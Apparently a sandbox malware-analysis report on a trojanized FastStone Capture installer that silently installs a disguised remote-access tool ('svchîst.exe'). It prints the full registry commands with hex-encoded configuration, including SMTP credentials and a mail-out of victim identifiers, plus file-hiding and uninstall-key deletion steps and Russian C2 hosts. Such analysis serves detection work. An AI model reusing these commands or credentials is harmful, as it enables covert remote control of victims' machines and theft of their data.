e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1704287999-475954601-507434648-99498296618945160581881223229-178814020-1478364456"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-399961077-1035419136-51538432659625727512808450381434048045-557356600-1801917240"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.136:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 109.234.156.179:5655 tcp

Files

memory/336-54-0x0000000075711000-0x0000000075713000-memory.dmp

memory/952-56-0x0000000000000000-mapping.dmp

memory/912-55-0x0000000000000000-mapping.dmp

memory/1788-58-0x0000000000000000-mapping.dmp

memory/1408-57-0x0000000000000000-mapping.dmp

memory/1148-59-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/708-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/1808-68-0x0000000000000000-mapping.dmp

memory/328-69-0x0000000000000000-mapping.dmp

memory/688-70-0x0000000000000000-mapping.dmp

memory/1536-72-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/1476-75-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
